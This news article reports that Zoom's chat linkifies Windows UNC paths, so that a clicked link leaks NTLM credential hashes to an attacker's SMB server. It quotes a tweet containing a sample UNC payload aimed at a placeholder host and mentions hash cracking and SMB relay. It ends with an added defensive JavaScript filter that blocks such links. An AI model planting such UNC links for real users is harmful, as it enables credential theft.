Zoom can leak Windows 10 network login information

Video calling software Zoom is facing a crisis in security and privacy. This comes after we learned that it leaks information to third parties, such as Facebook, and that it doesn't use end-to-end encryption as marketed.
A security specialist who goes by @_g0dmode on Twitter found that a URL shared in a Zoom group chat can also leak network credentials.
This is because Zoom not only converts URLs into clickable links, but also does the same for the Universal Naming Convention (UNC) paths that Windows uses for network resources.
UNC is used to locate a network resource. With this flaw, a link can make the client log in to an SMB server controlled by intruders. When someone clicks the link, the credentials used to log in to the network can be seen by the attacker, because by default Windows sends the username and the NT LAN Manager (NTLM) credential hash.
#Zoom chat allows you to post links such as \\x.x.x.x\xyz to attempt to capture Net-NTLM hashes if clicked by other users.
— Mitch (@_g0dmode) March 23, 2020
In addition, when an SMB connection is established with this method, the IP address, domain name, user name and client name of the connected person can also be seen.
The hash is derived from the credential, so the password itself is not sent in plain text. However, weak passwords can be cracked in a few seconds on an average GPU with software such as the John the Ripper password cracker.
Dear @zoom_us & @NCSC – well that escalated quickly…. Thanks to @AppSecBloke & @SeanWrightSec for letting me use their Zoom meeting to test. You can exploit UNC path injection to run arbitrary code, Windows does warn you with an alert box however. pic.twitter.com/aakSK1ohcL
— Hacker Fantastic (@hackerfantastic) April 1, 2020
Security specialist Matthew Hickey has shown that SMB Relay attacks can be carried out with the UNC path injection problem as well. He found that this bug can also be used to execute files remotely via a UNC path. In this case, however, Windows displays a warning.
According to Hickey, Zoom’s solution should be not to include UNC paths in web links. Zoom has not made a statement on the subject yet.
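One way a chat client could apply the fix Hickey describes, shown as an added example (not Zoom's code and not from the original article): an allow-list linkifier that turns only http/https URLs into links and leaves UNC-style paths as inert text. The function names and the sample message, which uses a documentation-range IP address, are constructed for illustration.

```javascript
// Added example: allow-list link rendering for chat messages.
// All names here are hypothetical; this is not code from any real client.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Escape text before placing it into HTML.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// True for tokens Windows could resolve as a remote path:
// \\host\share, //host/share, \\?\UNC\host\share and file: URLs.
function isUncLike(token) {
  return /^[\\/]{2}/.test(token) || /^file:/i.test(token);
}

// Render a message to HTML. Only http(s) URLs become links; UNC-like
// tokens stay plain text and are reported so they can be logged.
function renderChatMessage(message) {
  const blocked = [];
  const html = message
    .split(/(\s+)/) // keep the whitespace runs so spacing is preserved
    .map((token) => {
      if (token === "" || /^\s+$/.test(token)) return token;
      if (isUncLike(token)) {
        blocked.push(token);
        return escapeHtml(token);
      }
      let url;
      try {
        url = new URL(token); // throws for anything that is not an absolute URL
      } catch {
        return escapeHtml(token);
      }
      if (!ALLOWED_SCHEMES.has(url.protocol)) return escapeHtml(token);
      const href = escapeHtml(url.href);
      return `<a href="${href}" rel="noopener noreferrer">${escapeHtml(token)}</a>`;
    })
    .join("");
  return { html, blocked };
}

// Constructed sample message (backslashes doubled for the JS string literal).
const sample = "See https://example.com/agenda and \\\\203.0.113.7\\share\\minutes.docx";
console.log(renderChatMessage(sample));
```

The `blocked` list gives the client or a monitoring pipeline a place to record attempted UNC links instead of silently dropping them.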